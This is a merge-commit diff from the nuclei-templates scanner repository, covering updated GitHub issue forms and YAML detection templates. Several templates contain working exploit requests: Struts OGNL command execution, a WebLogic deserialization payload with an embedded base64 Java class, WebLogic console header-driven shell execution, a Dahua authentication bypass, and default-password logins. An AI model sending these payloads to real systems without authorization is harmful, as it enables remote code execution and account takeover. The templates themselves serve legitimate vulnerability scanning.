Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates
commit
fde188d253
|
@ -1,32 +0,0 @@
|
|||
---
|
||||
name: Bug report
|
||||
about: Create a issue to help us improve
|
||||
title: "[Bug] "
|
||||
labels: ''
|
||||
assignees: ''
|
||||
|
||||
---
|
||||
|
||||
**Nuclei version**
|
||||
|
||||
```
|
||||
nuclei -version
|
||||
```
|
||||
|
||||
**Nuclei template version**
|
||||
|
||||
```
|
||||
cat ~/.nuclei-config.json
|
||||
```
|
||||
|
||||
**Describe the bug**
|
||||
A clear and concise description of what the bug is.
|
||||
|
||||
**Commands to reproduce**
|
||||
|
||||
```
|
||||
nuclei -t xxx -target xxx
|
||||
```
|
||||
|
||||
**Screenshots**
|
||||
If applicable, add screenshots to help explain your problem.
|
|
@ -0,0 +1,14 @@
|
|||
blank_issues_enabled: false
|
||||
|
||||
contact_links:
|
||||
- name: Ask an question / advise on using nuclei-templates
|
||||
url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/q-a
|
||||
about: Ask a question or request support for using nuclei-templates
|
||||
|
||||
- name: Share idea / feature to discuss for nuclei-templates
|
||||
url: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/ideas
|
||||
about: Share idea / feature to discuss for nuclei-templates
|
||||
|
||||
- name: Connect with PD Team & Community (Discord)
|
||||
url: https://discord.gg/projectdiscovery
|
||||
about: Connect with PD Team & Community for direct communication
|
|
@ -1,30 +1,24 @@
|
|||
---
|
||||
name: False Positive
|
||||
about: 'Create an issue if you found false positive results. '
|
||||
title: "[false-positive] template-name "
|
||||
about: 'Issue for template producing false positive results.'
|
||||
labels: 'false-positive'
|
||||
assignees: ''
|
||||
|
||||
---
|
||||
|
||||
**Nuclei version**
|
||||
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
|
||||
|
||||
```
|
||||
nuclei -version
|
||||
```
|
||||
### Nuclei Version:
|
||||
|
||||
**Nuclei template version**
|
||||
<!-- You can find current version of nuclei with "nuclei -version" -->
|
||||
|
||||
```
|
||||
cat ~/.nuclei-config.json
|
||||
```
|
||||
### Template file:
|
||||
|
||||
**Template ID**
|
||||
<!-- Template producing false-positive results, for example: "cves/XX/XX.yaml" -->
|
||||
|
||||
Please submit the ID template producing false-positive results.
|
||||
### Command to reproduce:
|
||||
|
||||
**Commands to Reproduce**
|
||||
<!-- Please include the command to replicate the behavior so fix can be applied asap. -->
|
||||
<!-- if host information can not be shared publicly, please reach out to us on discord server in DM -->
|
||||
|
||||
```
|
||||
nuclei -t template_id -target ?
|
||||
```
|
||||
### Anything else:
|
||||
<!-- Links? References? Screnshots? Anything that will give us more context about the issue that you are encountering! -->
|
|
@ -1,16 +1,18 @@
|
|||
---
|
||||
name: Feature request
|
||||
about: Suggest an idea to improve nuclei templates
|
||||
title: "[Feature] "
|
||||
labels: ''
|
||||
assignees: ''
|
||||
|
||||
about: Request feature to implement in this project
|
||||
labels: 'Type: Enhancement'
|
||||
---
|
||||
|
||||
**Is your feature request related to a problem? Please describe.**
|
||||
<!--
|
||||
1. Please make sure to provide a detailed description with all the relevant information that might be required to start working on this feature.
|
||||
2. In case you are not sure about your request or whether the particular feature is already supported or not, please start a discussion instead.
|
||||
3. GitHub Discussion: https://github.com/projectdiscovery/nuclei-templates/discussions/categories/ideas
|
||||
4. Join our discord server at https://discord.gg/projectdiscovery to discuss the idea on the #nuclei-templates channel.
|
||||
-->
|
||||
|
||||
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
|
||||
### Please describe your feature request:
|
||||
<!-- A clear and concise description of feature to implement -->
|
||||
|
||||
**Describe the solution you'd like**
|
||||
|
||||
A clear and concise description of what you want to happen.
|
||||
### Describe the use case of this feature:
|
||||
<!-- A clear and concise description of the feature request's motivation and the use-cases in which it could be useful. -->
|
||||
|
|
|
@ -0,0 +1,21 @@
|
|||
---
|
||||
name: Issue report
|
||||
about: "Issue to report invalid template"
|
||||
labels: 'Type: Bug'
|
||||
|
||||
---
|
||||
|
||||
<!--
|
||||
1. Please search to see if an issue already exists for the bug you encountered.
|
||||
2. For support requests, FAQs or "How to" questions, please use the GitHub Discussions section instead - https://github.com/projectdiscovery/nuclei-templates/discussions or
|
||||
3. Join our discord server at https://discord.gg/projectdiscovery and post the question on the #nuclei-templates channel.
|
||||
-->
|
||||
|
||||
<!-- ISSUES MISSING IMPORTANT INFORMATION MAY BE CLOSED WITHOUT INVESTIGATION. -->
|
||||
|
||||
### Issue description:
|
||||
<!-- A concise description of what you're experiencing. -->
|
||||
|
||||
|
||||
### Anything else:
|
||||
<!-- Links? References? Screnshots? Anything that will give us more context about the issue that you are encountering! -->
|
|
@ -1,15 +1,23 @@
|
|||
---
|
||||
name: Submit Template
|
||||
about: Submit nuclei template using issue
|
||||
title: "[nuclei-template] template-name"
|
||||
name: Template Contribution
|
||||
about: Contributing nuclei template using GitHub Issue
|
||||
labels: 'nuclei-template'
|
||||
assignees: ''
|
||||
|
||||
---
|
||||
|
||||
**Template Details**
|
||||
### Template Information:
|
||||
|
||||
<!-- Include basic information of the template including reference -->
|
||||
<!-- Templates without any reference mostly likely to take more time for review/validation -->
|
||||
|
||||
|
||||
### Nuclei Template:
|
||||
|
||||
<!-- Include nuclei template in between code block shared below -->
|
||||
|
||||
|
||||
```yaml
|
||||
|
||||
nuclei template goes here
|
||||
```
|
||||
|
||||
<!-- Include template results if available or redacted valid response snippet of valid match -->
|
||||
<!-- Example response help us to update the matchers as unique as possible to avoid possible false-positive results. -->
|
|
@ -14,8 +14,3 @@ tags:
|
|||
|
||||
# files is a list of files to ignore template execution
|
||||
# unless asked for by the user.
|
||||
|
||||
files:
|
||||
- "token-spray/"
|
||||
|
||||
|
||||
|
|
|
@ -11,25 +11,19 @@ info:
|
|||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
|
||||
GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
|
||||
- |
|
||||
GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
|
||||
GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
|
||||
- |
|
||||
GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
|
||||
GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
|
||||
payloads:
|
||||
params:
|
||||
|
@ -40,11 +34,12 @@ requests:
|
|||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
condition: or
|
||||
status:
|
||||
- 200
|
||||
- 400
|
||||
condition: or
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
|
||||
part: body
|
||||
|
|
|
@ -91,15 +91,16 @@ requests:
|
|||
- webviewer
|
||||
- welcome
|
||||
|
||||
attack: sniper
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
condition: and
|
||||
words:
|
||||
- "environment variable"
|
||||
- "display library search paths"
|
||||
condition: and
|
||||
|
|
|
@ -22,14 +22,16 @@ requests:
|
|||
|
||||
payloads:
|
||||
ids: helpers/wordlists/numbers.txt
|
||||
attack: sniper
|
||||
|
||||
threads: 50
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "<title>Dashboard</title>"
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2019-2729
|
||||
|
||||
info:
|
||||
name: Oracle WebLogic Server Administration Console Handle RCE
|
||||
author: igibanez
|
||||
severity: critical
|
||||
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2019-2729
|
||||
tags: cve,cve2019,oracle,rce,weblogic
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wls-wsat/CoordinatorPortType HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: text/xml
|
||||
|
||||
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class="sun.misc.BASE64Decoder"><void method="decodeBuffer" id="byte_arr"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class="org.mozilla.classfile.DefiningClassLoader"><void method="defineClass"><string>ResultBaseExec</string><object idref="byte_arr"></object><void method="newInstance"><void method="do_exec" id="result"><string>echo${IFS}9272-9102-EVC|rev</string></void></void></void></void><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork" id="current_work"><void method="getClass"><void method="getDeclaredField"><string>connectionHandler</string><void method="setAccessible"><boolean>true</boolean></void><void method="get"><object idref="current_work"></object><void method="getServletRequest"><void method="getResponse"><void method="getServletOutputStream"><void method="writeStream"><object class="weblogic.xml.util.StringInputStream"><object idref="result"></object></object></void><void method="flush"/></void><void method="getWriter"><void method="write"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "CVE-2019-2729"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -28,8 +28,7 @@ requests:
|
|||
- |
|
||||
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
cmd: §exec§
|
||||
Connection: close
|
||||
cmd: {{exec}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=utf-8
|
||||
|
||||
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
|
||||
|
@ -41,12 +40,12 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
condition: or
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- "\\[(font|extension|file)s\\]"
|
||||
condition: or
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -31,11 +31,12 @@ requests:
|
|||
command:
|
||||
- "systeminfo" # Windows
|
||||
- "lsb_release -a" # Linux
|
||||
attack: sniper
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
condition: or
|
||||
regex:
|
||||
- "OS Name:.*Microsoft Windows"
|
||||
- "Distributor ID:"
|
||||
|
|
|
@ -22,6 +22,8 @@ requests:
|
|||
path:
|
||||
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
|
||||
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
|
||||
|
||||
skip-variables-check: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2021-20031
|
||||
|
||||
info:
|
||||
name: Sonicwall SonicOS 7.0 - Host Header Injection
|
||||
author: gy741
|
||||
severity: medium
|
||||
description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50414
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20031
|
||||
metadata:
|
||||
google-dork: inurl:"auth.html" intitle:"SonicWall"
|
||||
tags: cve,cve2021,sonicwall,redirect
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-20031
|
||||
cwe-id: CWE-601
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{randstr}}.tld
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'https://{{randstr}}.tld/auth.html'
|
||||
- 'Please be patient as you are being re-directed'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,54 @@
|
|||
id: CVE-2021-33044
|
||||
|
||||
info:
|
||||
name: Dahua IPC/VTH/VTO devices Authentication Bypass
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
|
||||
reference:
|
||||
- https://github.com/dorkerdevil/CVE-2021-33044
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-33044
|
||||
- https://seclists.org/fulldisclosure/2021/Oct/13
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-33044
|
||||
cwe-id: CWE-287
|
||||
tags: dahua,cve,cve2021,auth-bypass
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /RPC2_Login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
Connection: close
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Origin: http://{{Hostname}}/
|
||||
Referer: http://{{Hostname}}/
|
||||
|
||||
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "true"
|
||||
- "id"
|
||||
- "params"
|
||||
- "session"
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
group: 1
|
||||
part: body
|
||||
regex:
|
||||
- ',"result":true,"session":"([a-z]+)"\}'
|
|
@ -1,4 +1,5 @@
|
|||
id: grafana-default-login
|
||||
|
||||
info:
|
||||
name: Grafana Default Login
|
||||
author: pdteam
|
||||
|
@ -26,7 +27,6 @@ requests:
|
|||
username:
|
||||
- admin
|
||||
- admin
|
||||
|
||||
password:
|
||||
- prom-operator
|
||||
- admin
|
||||
|
@ -35,15 +35,13 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- grafana_session
|
||||
- "grafana_session" # Login cookie
|
||||
part: header
|
||||
# Check for 'grafana_session' cookie on valid login in the response header.
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- Logged in
|
||||
part: body
|
||||
# Check for valid string on valid login.
|
||||
words:
|
||||
- "Logged in" # Logged in keyword
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -20,15 +20,13 @@ requests:
|
|||
username:
|
||||
- admin
|
||||
|
||||
attack: sniper
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
condition: and
|
||||
words:
|
||||
- '"redirect": "/htdocs/pages/main/main.lsp"'
|
||||
- '"error": ""'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -18,22 +18,21 @@ requests:
|
|||
|
||||
payloads:
|
||||
password:
|
||||
- 12345
|
||||
attack: sniper
|
||||
- "12345"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
condition: and
|
||||
words:
|
||||
- "session_id="
|
||||
- "resource"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Invalid Password"
|
||||
part: body
|
||||
negative: true
|
||||
words:
|
||||
- "Invalid Password"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -0,0 +1,23 @@
|
|||
id: alienVault-usm
|
||||
|
||||
info:
|
||||
name: AlienVault USM
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
tags: panel
|
||||
metadata:
|
||||
shodan: 'http.title:"AlienVault USM"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/ossim/session/login.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>AlienVault USM'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,23 @@
|
|||
id: exsi-system
|
||||
|
||||
info:
|
||||
name: ESXi System
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
tags: panel
|
||||
metadata:
|
||||
shodan: 'html:"esxUiApp"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/ui/#/login'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'ng-app="esxUiApp"'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,24 @@
|
|||
id: samsung-printer-detect
|
||||
|
||||
info:
|
||||
name: SAMSUNG Printer Detection
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
tags: iot,panel
|
||||
metadata:
|
||||
fofa-dork: 'app="SAMSUNG-Printer"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/sws/index.html"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title> SyncThru Web Service </title>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,23 @@
|
|||
id: sql-monitor
|
||||
|
||||
info:
|
||||
name: SQL Monitor
|
||||
author: dhiyaneshDK
|
||||
severity: info
|
||||
tags: panel
|
||||
metadata:
|
||||
shodan: 'html:"SQL Monitor"'
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/Account/LogIn?returnUrl=%2F&hasAttemptedCookie=True'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<p>JavaScript needs to be enabled for SQL Monitor to work properly.</p>'
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -36,6 +36,7 @@ requests:
|
|||
- "{{BaseURL}}/.github/workflows/ci-daily.yml"
|
||||
- "{{BaseURL}}/.github/workflows/ci-issues.yml"
|
||||
- "{{BaseURL}}/.github/workflows/smoosh-status.yml"
|
||||
- "{{BaseURL}}/.github/workflows/snyk.yml"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
|
|
@ -0,0 +1,29 @@
|
|||
id: gruntfile-exposure
|
||||
|
||||
info:
|
||||
name: Gruntfile Exposure
|
||||
author: sbani
|
||||
severity: info
|
||||
